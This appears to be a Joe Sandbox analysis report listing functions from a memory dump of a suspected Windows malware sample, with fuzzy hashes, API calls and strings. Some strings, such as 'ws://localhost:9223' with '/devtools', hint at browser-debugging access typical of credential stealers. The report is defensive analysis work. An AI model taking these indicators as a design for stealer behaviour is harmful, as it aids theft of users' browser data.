Instruction ID: f8fc8f2a64206029de1e7f1e4b3ad3fd3ae9e26a98284dde362114d0b7620706
Opcode Fuzzy Hash: 54b9c82a713e1647d260def757d0a948b7046694d7ad337d743321e3225f6e9f
Instruction Fuzzy Hash: 2911ED5810D2E059CB1B8B7541A45A2BFE25DAF10977ED0DDD4D80E3A7C0A7C58BD732

Function 0041EF51 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23c2beb31796bd73ba3405afa20eb797d15acb8a7dbc67d580fc6a693144fab
Instruction ID: 0e5454ff1cf141f6970ade37cfd018851782c4dac029dc11aa7d775549405aef
Opcode Fuzzy Hash: e23c2beb31796bd73ba3405afa20eb797d15acb8a7dbc67d580fc6a693144fab
Instruction Fuzzy Hash: 6111ED4810D2E059CB1B8B3540A49A2BFE25DAF10977ED0CDD4D80E3A7C0ABC58BE732

Function 004015DF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a93f6a8cd4d47df05c78eab3a44aff0d759dd350f23cc4f4d7f68ebc0c78d12
Instruction ID: 22116eef3f2273cfe5a8c2e9c41e65b8715a71c3a701b7abc3ba02d849d03f4d
Opcode Fuzzy Hash: 3a93f6a8cd4d47df05c78eab3a44aff0d759dd350f23cc4f4d7f68ebc0c78d12
Instruction Fuzzy Hash: EEE0C2322616449FC204CF18CCD4E1273A9EB8C754B1B006CE8025B712C730BC04CA21

Function 00401661 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655

Function 0040190C Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501

Function 0042259D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 192stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,0066120F), ref: 004225D1
lstrcatA.KERNEL32(?,00000000), ref: 00422629
lstrcatA.KERNEL32(?,00000000), ref: 00422681
lstrcatA.KERNEL32(?,00660FFB), ref: 004226B9
lstrcatA.KERNEL32(?,00000000), ref: 00422711
lstrcatA.KERNEL32(?,00000000), ref: 0042277B

Strings

d=E, xrefs: 004227A9

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat
String ID: d=E
API String ID: 4038537762-3703654223
Opcode ID: 6b258883751747a047630860852b76eb666baa1f2a0d48bec97887eab96c2c49
Instruction ID: 787f5a1883bd1a92c764b1f5073ff24f0c1a0a171341e5f139d16835dd81bd73
Opcode Fuzzy Hash: 6b258883751747a047630860852b76eb666baa1f2a0d48bec97887eab96c2c49
Instruction Fuzzy Hash: D27129B5A12218DFD344CF58DC94DAA73F9BF892217440468E829E7362D774EE09CB78

Function 0043E690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0043E83E
GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0043E887

Strings

m&q9, xrefs: 0043E818
HttpQueryInfoA, xrefs: 0043E830, 0043E836, 0043E83C
InternetSetOptionA, xrefs: 0043E879, 0043E87F, 0043E885

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: HttpQueryInfoA$InternetSetOptionA$m&q9
API String ID: 190572456-3642299867
Opcode ID: e884e536bd4fb761ddbb9277ab380c44a344506145dd67f0df72f5f54d870151
Instruction ID: 98888633d930fc3f68b7ae1b75c13118300460b7db9654319f762892afa8a6d7
Opcode Fuzzy Hash: e884e536bd4fb761ddbb9277ab380c44a344506145dd67f0df72f5f54d870151
Instruction Fuzzy Hash: 6F51AC365063099FE708CF55DCE8D91B7A5FB4D30A31406A9ED12A736BF632A901CF45

Function 004325E3 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 184fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00432784
DeleteFileA.KERNEL32(00000000), ref: 004327F3

Strings

"R, xrefs: 0043283E
%s\%s, xrefs: 0043260F, 00432615, 00432629

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$CopyDelete
String ID: "R$%s\%s
API String ID: 2687465029-1330689491
Opcode ID: 0c235ffeb9cdb5e5402ee528d37386d9bf2a8fdb39c3761a39d7d94802ac60cf
Instruction ID: d5026690ed90791daf1852e796855019d1112d58b0cd7ae693c2139466fe721d
Opcode Fuzzy Hash: 0c235ffeb9cdb5e5402ee528d37386d9bf2a8fdb39c3761a39d7d94802ac60cf
Instruction Fuzzy Hash: AE71F635A02204CFCB25DFACDD99F9DB7B6AF88305744406AE809E7365DAB0EE15CB44

Function 00437304 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00437329

Strings

d=E, xrefs: 00437380
d=E, xrefs: 0043736C
d=E, xrefs: 00437335

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateEvent
String ID: d=E$d=E$d=E
API String ID: 2692171526-2757786290
Opcode ID: d1988c51bc93c6c7c96dfe98e9345a11fdff1b557833e9bd00fce34000985eea
Instruction ID: 6d63f5addddcf0f202a3d96c4c4cfef29e5f3cf64ecf2c301d3244b61fc77ad2
Opcode Fuzzy Hash: d1988c51bc93c6c7c96dfe98e9345a11fdff1b557833e9bd00fce34000985eea
Instruction Fuzzy Hash: AE213B76A003158FD324CF6CDCD1A69B3F5BF98205B54856AE806D3722D774EE49CB09

Function 004368CD Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004368E9
memset.MSVCRT ref: 00436A30
memset.MSVCRT ref: 00436B52

Strings

f, xrefs: 00436BC9

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memset
String ID: f
API String ID: 2221118986-3250913874
Opcode ID: 51e869dcd3b6f677a8cb302e85ce408046a46f74e45f9a3a55c7ac45e0a7eb9a
Instruction ID: 383a12688e8010a4742b0d5500bcaeafe37ba5c7293955c951a3f4013cd9ba2d
Opcode Fuzzy Hash: 51e869dcd3b6f677a8cb302e85ce408046a46f74e45f9a3a55c7ac45e0a7eb9a
Instruction Fuzzy Hash: CFB119B6B003049FC714DB6CDCC5EA973F9EF98701B090165E909CB3A2E674F9688B95

Function 0041FAE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041FB5C

Strings

/devtools, xrefs: 0041FB1D, 0041FB23, 0041FB36
ws://localhost:9223, xrefs: 0041FB76, 0041FB7C, 0041FB89
localhost, xrefs: 0041FAF2, 0041FAF8, 0041FB08

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: memset
String ID: /devtools$localhost$ws://localhost:9223
API String ID: 2221118986-2676143373
Opcode ID: f28d1d7685b759f1b9fa703e398c4b34b2761e0bba58c726aef41920fd6a890e
Instruction ID: 92f363432d231bec1e3fb9884c8ea9c77849bc815585ae96951a962bcb6a1e0d
Opcode Fuzzy Hash: f28d1d7685b759f1b9fa703e398c4b34b2761e0bba58c726aef41920fd6a890e
Instruction Fuzzy Hash: 883191726003149BDB04DBA9ECC1E6A3BA9EBC4705B08016CB51AE3352DE34EE45CB58

Function 00401DE8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00402019

Strings

d=E, xrefs: 00401E29
d=E, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CopyFile
String ID: d=E$d=E
API String ID: 1304948518-3333608182
Opcode ID: f3c819ef3b7be1bc81a93b26faec0c56b614ff0994c5297cd0ea10bafbb97f72
Instruction ID: 40807189775480ff61ea03033ac9fbf616a983455c9c9627938ee44d9787b36e
Opcode Fuzzy Hash: f3c819ef3b7be1bc81a93b26faec0c56b614ff0994c5297cd0ea10bafbb97f72
Instruction Fuzzy Hash: 01713BB67106049FD704EB6CDC94E79B3F9EF88642704402ABC09CB367DAB0E905CB69

Function 0041616F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memorynetworkCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,05F5E0FF), ref: 004161D2
InternetOpenA.WININET ref: 00416207

Strings

w^[, xrefs: 00416239

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocHeapInternetOpen
String ID: w^[
API String ID: 3923703710-16548880
Opcode ID: a1638082982306e34ac1f098ff68b987714235ef98815029bbf8e274638c6147
Instruction ID: e61c4e438cf44e9afb17fba8852656beb94c4771829aab21b84e6b0e2fc281db
Opcode Fuzzy Hash: a1638082982306e34ac1f098ff68b987714235ef98815029bbf8e274638c6147
Instruction Fuzzy Hash: CF219075A043149FCB11DF68ED88E66B7B5FF88318B145065E804AB321FB75EC46CB88

Function 00445DD3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,o\D,?,?,?,?,00445C6F,?,00454918), ref: 00445E33

Strings

o\D, xrefs: 00445E20, 00445E23
o\D, xrefs: 00445DDE

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID: o\D$o\D
API String ID: 3997070919-1036646098
Opcode ID: 6de0789d5692800966e128f0a9704dd1aab96af69cd8c3b06280eef38521470e
Instruction ID: d544751a945a854ffd68f1f41616989cf1c49f82d7c6857626cc0b9f37387063
Opcode Fuzzy Hash: 6de0789d5692800966e128f0a9704dd1aab96af69cd8c3b06280eef38521470e
Instruction Fuzzy Hash: 9D01A275900218ABDB01AF58D880BAEBBB9FF44705F15415AE905AB391D770EE01CBD0

Function 0043EABF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,SymMatchString), ref: 0043EAF4

Strings

m&q9, xrefs: 0043EACA
SymMatchString, xrefs: 0043EAE6, 0043EAEC, 0043EAF2

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: SymMatchString$m&q9
API String ID: 190572456-2901065828
Opcode ID: 48426114102d4f69633aeda60fc7b8f91cd8caec4c6cbf8d8087bb554d2e4d2a
Instruction ID: ee68131d8aa817b38d5ea4767a79b4c1883823544b2436cf1bf4c004c8d39961
Opcode Fuzzy Hash: 48426114102d4f69633aeda60fc7b8f91cd8caec4c6cbf8d8087bb554d2e4d2a
Instruction Fuzzy Hash: 20E0DF762063048FE308CB21ECD0C51B369E79D36A3110262EE0183716F230A9018E58

